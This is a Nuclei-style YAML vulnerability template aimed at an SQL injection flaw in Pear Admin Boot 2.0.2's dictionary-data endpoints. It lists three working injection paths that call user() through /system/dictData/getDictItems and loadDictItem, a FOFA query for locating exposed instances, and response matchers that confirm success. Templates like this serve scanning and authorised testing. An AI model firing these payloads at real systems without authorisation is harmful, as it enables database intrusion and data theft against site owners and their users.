id: pearadminboot-sysstem-dicdata-sqli
info:
  name: pearadminboot sysstem dicdata - sqli
  author: leadlife
  severity: high
  description: 在Pear Admin Boot 2.0.2版本中发现了一个漏洞，并被列为严重漏洞。此问题影响文件/system/dictData/getDictItems/的getDictItems函数。输入,user(),1,1 的操作会导致SQL注入。
  reference: 
    - https://github.com/wy876/POC/blob/c8b3f3242900ed52daaba0c9a8c5992298b740e8/Pear-Admin-Boot%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="明 湖 区 最 具 影 响 力 的 设 计 规 范 之 一"
  tags: pearadminboot,sqli

http:
  - raw:
      - |
        GET /{{fucksqli}} HTTP/1.1
        Host: {{Hostname}}

    payloads:
      fucksqli:
        - 'system/dictData/getDictItems/gen_table,user(),1,1'
        - 'system/dictData/getDictItems/sys_user,user(),1'
        - 'system/dictData/loadDictItem/sys_user,user(),1?key=1'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "createTime"
          - "updateTime"
          - "success"
        condition: and

      - type: status
        status:
          - 200

# now can't sqlmap